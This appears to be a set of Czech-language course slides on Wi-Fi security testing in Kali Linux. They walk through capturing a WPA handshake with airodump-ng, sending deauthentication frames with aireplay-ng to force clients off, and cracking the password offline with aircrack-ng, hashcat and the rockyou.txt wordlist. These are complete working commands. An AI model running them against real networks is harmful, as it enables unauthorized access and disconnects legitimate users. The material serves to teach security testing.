Letní škola sítí
Testování bezpečnosti Wi-Fi v prostředí Kali Linux
airmon-ng)airodump-ng)aireplay-ng)aircrack-ng a hashcat)MojeMojeWifi).Primitivní RC4 šifrování. Dnes prolomitelné během několika sekund.
Používá AES šifrování a 4-Way Handshake. Zranitelné vůči offline slovníkovým útokům.
Nejnovější standard (SAE handshake). Odolné vůči slovníkovým útokům z odchyceného provozu.
airmon-ng – správa módů kartyairodump-ng – odchytávání paketůaireplay-ng – generování útočných rámcůaircrack-ng – louskání heselV Kali Linuxu zjistíme název bezdrátové karty příkazem iwconfig:
iwconfig
Hledáme rozhraní jako wlan0 nebo wlan0mon.
Správci sítě (NetworkManager, wpa_supplicant) mohou s přepnutím karty soupeřit:
sudo airmon-ng check kill
Tento příkaz ukončí procesy na pozadí, které by kartu vracely do managed módu.
Přepneme kartu wlan0 do monitorovacího režimu:
sudo airmon-ng start wlan0
Vznikne nové rozhraní: wlan0mon.
iwconfig wlan0mon
airodump-ngSpustíme skener, který prohledává všechny kanály ve vzduchu:
sudo airodump-ng wlan0mon
Vypíše seznam dostupných přístupových bodů (AP) a připojených klientů.
airodump-ng?Lockneme kartu na kanál oběti a ukládáme pakety do souboru:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w vysledek wlan0mon
-c 6 = Číslo kanálu
--bssid ... = MAC adresa cílového routeru
-w vysledek = Prefix pro uložení do vysledek-01.cap
Proces, při kterém se klient přihlašuje k Wi-Fi síti.
Nechceme čekat hodiny, až se někdo dobrovolně přihlásí. Pošleme deautentizační rámec!
802.11 Deauth frame: V Wi-Fi síti nejsou řídící rámce šifrované! Útočník může poslat zprávu jménem routeru: „Odpoj se!“
aireplay-ngV druhém okně terminálu odešleme 10 deautentizačních paketů klientovi:
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
-a ... = MAC adresa routeru (BSSID)-c ... = MAC adresa odpojovaného klienta (Station)V okně s airodump-ng sledujeme horní pravý roh:
[ WPA handshake: AA:BB:CC:DD:EE:FF ]
Máme vyhráno! Handshake je uložený v souboru vysledek-01.cap.
12345678, heslo123), spočítáme z něj kryptografický klíč a ověříme, zda odpovídá Handshaku.aircrack-ngPoužijeme vestavěný slovník v Kali Linuxu (rockyou.txt):
aircrack-ng -w /usr/share/wordlists/rockyou.txt vysledek-01.cap
rockyou.txt obsahuje přes 14 miliónů nejčastějších reálných hesel!
Pokud bylo heslo ve slovníku, aircrack-ng ho vypíše:
KEY FOUND! [ slunicko123 ]
Při louskání přes procesor (CPU) zvládnete ~2 000 hesel/s. Na GPU (Nvidia/AMD) zvládnete 500 000+ hesel/s!
# 1. Převod .cap na .hc22000 formát
hcxpcapngtool -o export.hc22000 vysledek-01.cap
# 2. Spuštění louskání v Hashcatu na GPU
hashcat -m 22000 export.hc22000 /usr/share/wordlists/rockyou.txt
Praktický tahák s příkazy (Cheatsheet):
Otevřete si v novém okně prezentaci commands.html, kde máte všechny příkazy přehledně seřazené po jednotlivých krocích!
airodump-ng skenuje provoz a ukládá 4-Way Handshake do .cap.aireplay-ng posílá deautentizační rámce pro opakováné přihlášení.aircrack-ng ověřuje slova ze slovníku proti zachycenému handshaku.